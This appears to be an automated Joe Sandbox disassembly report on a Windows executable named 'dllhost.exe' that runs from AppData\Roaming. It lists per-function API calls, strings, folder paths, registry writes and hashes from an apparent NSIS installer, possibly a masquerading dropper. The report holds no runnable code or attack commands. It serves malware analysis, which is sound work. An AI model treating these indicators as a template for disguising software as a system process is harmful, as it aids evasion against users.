                                                                              (rendered graph not reproducible in text; node and edge listing omitted; legend: Executed / Not Executed)
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D44
                                                                              • ShowWindow.USER32(?), ref: 00403D61
                                                                              • DestroyWindow.USER32 ref: 00403D75
                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D91
                                                                              • GetDlgItem.USER32(?,?), ref: 00403DB2
                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DC6
                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403DCD
                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403E7B
                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403E85
                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403E9F
                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EF0
                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403F96
                                                                              • ShowWindow.USER32(00000000,?), ref: 00403FB7
                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FC9
                                                                              • EnableWindow.USER32(?,?), ref: 00403FE4
                                                                              • GetSystemMenu.USER32 ref: 00403FFA
                                                                              • EnableMenuItem.USER32 ref: 00404001
                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404019
                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040402C
                                                                              • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404056
                                                                              • SetWindowTextW.USER32(?,004236E8,00000000,004236E8,?,004236E8,00000000), ref: 0040406A
                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040419E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                              • String ID: L)Z$6B
                                                                              • API String ID: 3282139019-282312273
                                                                              • Opcode ID: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                                                              • Instruction ID: aba62e874285a6ff7dd8be06960963098d8abb6283381b386aa5fa49e43a5191
                                                                              • Opcode Fuzzy Hash: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                                                              • Instruction Fuzzy Hash: 35C1C071640205BBDB216F61EE88E2B3A6CFB95705F40053EF641B52F0CB3A5992DB2D

                                                                              Control-flow Graph
                                                                              (rendered graph not reproducible in text; node and edge listing omitted; legend: Executed / Not Executed)
                                                                              APIs
                                                                                • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                                • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                                              • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,7570D4C4,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000), ref: 004039DB
                                                                              • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A5B
                                                                              • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A6E
                                                                              • GetFileAttributesW.KERNEL32(: Completed), ref: 00403A79
                                                                              • LoadImageW.USER32 ref: 00403AC2
                                                                                • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                                              • RegisterClassW.USER32(004291A0), ref: 00403AFF
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B17
                                                                              • CreateWindowExW.USER32 ref: 00403B4C
                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403B82
                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BAE
                                                                              • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BBB
                                                                              • RegisterClassW.USER32(004291A0), ref: 00403BC4
                                                                              • DialogBoxParamW.USER32 ref: 00403BE3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                              • API String ID: 1975747703-3853068990
                                                                              • Opcode ID: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                                                              • Instruction ID: 49200ef38db144648603e0831490e707cb7affae0874970ced47d7304c9e666f
                                                                              • Opcode Fuzzy Hash: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                                                              • Instruction Fuzzy Hash: D561B970204601BAE330AF669D49F2B3A7CEB84745F40457FF945B52E2CB7D5912CA2D

                                                                              Control-flow Graph
                                                                              (rendered graph not reproducible in text; node and edge listing omitted; legend: Executed / Not Executed)
                                                                              APIs
                                                                              • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000,004035F7,00000006,?,00000006,00000008,0000000A), ref: 00402ED2
                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\dllhost.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                                                • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\AppData\Roaming\dllhost.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                                • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D64
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\dllhost.exe,C:\Users\user\AppData\Roaming\dllhost.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\dllhost.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                              • API String ID: 4283519449-3159565494
                                                                              • Opcode ID: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                                              • Instruction ID: c18f197c65803053ad6b90da34fb4f59cecbc903e05eff4d530fc012fb388881
                                                                              • Opcode Fuzzy Hash: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                                              • Instruction Fuzzy Hash: 3E51F271A01205AFDB209F65DD85B9E7EA8EB04319F10407BF904B72D5CB788E818BAD

                                                                              Control-flow Graph (figure; entry block 40626e, blocks through 4064dd; legend: Executed / Not Executed; basic-block edge list not reproduced)
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004052E7,Completed,00000000), ref: 004063AF
                                                                              • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004052E7,Completed,00000000), ref: 004063C2
                                                                              • SHGetFolderPathW.SHELL32(004052E7,00000000,00000000,: Completed,00000000,Completed,?,004052E7,Completed,00000000), ref: 004063EA
                                                                              • SHGetSpecialFolderLocation.SHELL32(004052E7,005A5ADC,00000000), ref: 004063FE
                                                                              • SHGetPathFromIDListW.SHELL32(005A5ADC,: Completed), ref: 0040640C
                                                                              • CoTaskMemFree.OLE32(005A5ADC), ref: 00406417
                                                                              • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D
                                                                              • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004052E7,Completed,00000000), ref: 00406495
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryFolderPath$FreeFromListLocationSpecialSystemTaskWindowslstrcatlstrlen
                                                                              • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                              • API String ID: 1812420262-905382516
                                                                              • Opcode ID: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                                                              • Instruction ID: 1d846ac168704965e63d6b1540e117b92082746421250facdf4000baa2e8fd31
                                                                              • Opcode Fuzzy Hash: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                                                              • Instruction Fuzzy Hash: 8F610E71A00105ABDF249F64CC40AAE37A9EF50314F62813FE943BA2D0D77D49A2C79E

                                                                              Control-flow Graph (figure; entry block 4052b0, blocks through 405380; legend: Executed / Not Executed; basic-block edge list not reproduced)
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(Completed,00000000,005A5ADC,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                              • lstrlenW.KERNEL32(00403233,Completed,00000000,005A5ADC,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                              • lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,005A5ADC,00403094), ref: 0040530B
                                                                              • SetWindowTextW.USER32(Completed,Completed,00000000,005A5ADC,00403094,?,?,?,?,?,?,?,?,?,00403233), ref: 0040531D
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                              • String ID: Completed
                                                                              • API String ID: 2531174081-3087654605
                                                                              • Opcode ID: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                                                              • Instruction ID: a4acd4142143b7f1d9b449385db23515f6e2bed73a3e7c1e364118513a645948
                                                                              • Opcode Fuzzy Hash: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                                                              • Instruction Fuzzy Hash: 09216071900518BACB21AF66DD84DDFBF74EF45350F14807AF944B62A0C7794A51CF68

                                                                              Control-flow Graph (figure; entry block 4065b6, blocks through 406623; legend: Executed / Not Executed; basic-block edge list not reproduced)
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104,UXTHEME), ref: 004065CD
                                                                              • wsprintfW.USER32 ref: 00406608
                                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                              • API String ID: 2200240437-1946221925
                                                                              • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                              • Instruction ID: f2f916ca2f11fba704df1b43a3ace0cea71321b702594bff0db05fa861777559
                                                                              • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                              • Instruction Fuzzy Hash: F9F0F670500219BBCF24AB68ED0DF9B3B6CAB00704F50447AA646F10D1EB78DA24CBA8

                                                                              Control-flow Graph (figure; entry block 4030fa, blocks through 4032dc; legend: Executed / Not Executed; basic-block edge list not reproduced)
                                                                              APIs
                                                                              • GetTickCount.KERNEL32(?,00000004,00000000,00000000,00000000), ref: 0040315B
                                                                              • GetTickCount.KERNEL32(0040CEA0,00004000), ref: 004031DC
                                                                              • MulDiv.KERNEL32 ref: 00403209
                                                                              • wsprintfW.USER32 ref: 0040321C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CountTick$wsprintf
                                                                              • String ID: ... %d%%
                                                                              • API String ID: 551687249-2449383134
                                                                              • Opcode ID: 52136a46cc721e38218c1625eaa21fc4b877046288e446531aa411092f1c675d
                                                                              • Instruction ID: 2f3e22fda6cf622f8bf4b8160786ddb998526db62ce5623fe0a3028d3f0862ac
                                                                              • Opcode Fuzzy Hash: 52136a46cc721e38218c1625eaa21fc4b877046288e446531aa411092f1c675d
                                                                              • Instruction Fuzzy Hash: A3517171900219EBCB10DF65DA48B9F3B68AF45366F1441BFF805B72C0D7789E508BA9

                                                                              Control-flow Graph (figure; entry block 40577f, blocks through 4057f9; legend: Executed / Not Executed; basic-block edge list not reproduced)
                                                                              APIs
                                                                              • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                                                              • GetLastError.KERNEL32 ref: 004057D6
                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
                                                                              • GetLastError.KERNEL32 ref: 004057F5
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming, xrefs: 0040577F
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                              • String ID: C:\Users\user\AppData\Roaming
                                                                              • API String ID: 3449924974-2707566632
                                                                              • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                              • Instruction ID: a96db4d766433405fa600e453148f039d13b259e3fca1cfbe784ddd29ae139cf
                                                                              • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                              • Instruction Fuzzy Hash: 52010871C10619DADF01DFA4CD44BEFBBB8EB14355F00407AD545B6281E7789608DFA9

                                                                               Control-flow Graph (basic blocks and edges)
                                                                               • 653: 405d6d-405d79
                                                                               • 654: 405d7a-405dae GetTickCount, GetTempFileNameW
                                                                               • 655: 405db0-405db2
                                                                               • 656: 405dbd-405dbf
                                                                               • 657: 405db4
                                                                               • 658: 405db7-405dba
                                                                               • Edges: 653->654, 654->655, 654->656, 655->654, 655->657, 656->658, 657->658
                                                                              APIs
                                                                              • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,?,"C:\Users\user\AppData\Roaming\dllhost.exe" ,0040333B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7570D4C4,00403589,?,00000006), ref: 00405D8B
                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\AppData\Roaming\dllhost.exe" ,0040333B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7570D4C4,00403589), ref: 00405DA6
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CountFileNameTempTick
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                              • API String ID: 1716503409-338990885
                                                                              • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                              • Instruction ID: 85bdb6a116c51bdc328f0f27a7d8b9c38e3c9c6247ffb38d9ffcafb3e867c1bf
                                                                              • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                              • Instruction Fuzzy Hash: D2F03076601704FBEB009F69ED09F9FB7ADEF95710F10803BE901E7250E6B0A9548B64

                                                                               Control-flow Graph (basic blocks and edges)
                                                                               • 659: 401c19-401c39 call 402c15 * 2
                                                                               • 664: 401c45-401c49
                                                                               • 665: 401c3b-401c42 call 402c37
                                                                               • 667: 401c55-401c5b
                                                                               • 668: 401c4b-401c52 call 402c37
                                                                               • 671: 401ca9-401cd3 call 402c37 * 2, FindWindowExW
                                                                               • 672: 401c5d-401c79 call 402c15 * 2
                                                                               • 682: 401c99-401ca7 SendMessageW
                                                                               • 683: 401c7b-401c97 SendMessageTimeoutW
                                                                               • 684: 401cd9
                                                                               • 685: 401cdc-401cdf
                                                                               • 686: 401ce5
                                                                               • 687: 402abf-402ace
                                                                               • Edges: 659->664, 659->665, 664->667, 664->668, 665->664, 667->671, 667->672, 668->667, 671->684, 672->682, 672->683, 682->684, 683->685, 684->685, 685->686, 685->687, 686->687
                                                                              APIs
                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Timeout
                                                                              • String ID: !
                                                                              • API String ID: 1777923405-2657877971
                                                                              • Opcode ID: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                                              • Instruction ID: 29033229b0686faa5c7805d11c7179544b5b5cf9f353c3a0c808591dcba6bfc2
                                                                              • Opcode Fuzzy Hash: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                                              • Instruction Fuzzy Hash: 1521C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D1D7B84541DB28

                                                                               Control-flow Graph (basic blocks and edges)
                                                                               • 690: 4023de-40240f call 402c37 * 2, call 402cc7
                                                                               • 697: 402415-40241f
                                                                               • 698: 402abf-402ace
                                                                               • 700: 402421-40242e call 402c37, lstrlenW
                                                                               • 701: 402432-402435
                                                                               • 702: 402437-402448 call 402c15
                                                                               • 703: 402449-40244c
                                                                               • 707: 40245d-402471 RegSetValueExW
                                                                               • 708: 40244e-402458 call 4030fa
                                                                               • 712: 402473
                                                                               • 713: 402476-402557 RegCloseKey
                                                                               • 715: 402885-40288c
                                                                               • Edges: 690->697, 690->698, 697->700, 697->701, 700->701, 701->702, 701->703, 702->703, 703->707, 703->708, 707->712, 707->713, 708->707, 712->713, 713->698, 713->715, 715->698
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(sarcoderma,00000023,00000011,00000002), ref: 00402429
                                                                              • RegSetValueExW.KERNEL32 ref: 00402469
                                                                              • RegCloseKey.KERNEL32(?), ref: 00402551
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CloseValuelstrlen
                                                                              • String ID: sarcoderma
                                                                              • API String ID: 2655323295-3317469366
                                                                              • Opcode ID: 5b41d600a9c01ed503e2f7d7031b514b7e0553d86e83f8d8ce72929142521f87
                                                                              • Instruction ID: f6ab6de36865f89e990f87fcf60bb758a602a58abc301ab7ae12c482c30fe319
                                                                              • Opcode Fuzzy Hash: 5b41d600a9c01ed503e2f7d7031b514b7e0553d86e83f8d8ce72929142521f87
                                                                              • Instruction Fuzzy Hash: 7C118171E00108BEEB10AFA5DE49EAEBAB8EB54354F11803AF505F71D1DBB84D419B58

                                                                               Control-flow Graph (basic blocks and edges)
                                                                               • 716: 402d2a-402d53 call 4060b9
                                                                               • 718: 402d58-402d5a
                                                                               • 719: 402dd0-402dd4
                                                                               • 720: 402d5c-402d62
                                                                               • 721: 402d7e-402d93 RegEnumKeyW
                                                                               • 722: 402d64-402d66
                                                                               • 723: 402d95-402da7 RegCloseKey, call 406626
                                                                               • 724: 402db6-402dc2 RegCloseKey
                                                                               • 725: 402d68-402d7c call 402d2a (the function's own entry address: the key enumeration recurses into each subkey before RegDeleteKeyW is reached)
                                                                               • 730: 402dc4-402dca RegDeleteKeyW
                                                                               • 731: 402da9-402db4
                                                                               • Edges: 716->718, 718->719, 718->720, 720->721, 721->722, 721->723, 722->724, 722->725, 723->730, 723->731, 724->719, 725->721, 725->723, 730->719, 731->719
                                                                              APIs
                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Close$Enum
                                                                              • String ID:
                                                                              • API String ID: 464197530-0
                                                                              • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                              • Instruction ID: 57c196990662b4067a631aae43276665adbe806e29497986ae1bc13e9df6c193
                                                                              • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                              • Instruction Fuzzy Hash: 4C115832540509FBDF129F90CE09BAE7B69AF58340F110076B905B50E0E7B59E21AB68
                                                                              APIs
                                                                                • Part of subcall function 00405BC8: CharNextW.USER32(?), ref: 00405BD6
                                                                                • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
                                                                                • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3
                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                • Part of subcall function 0040577F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,?,00000000,000000F0), ref: 0040164D
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea, xrefs: 00401640
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                              • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea
                                                                              • API String ID: 1892508949-1965738620
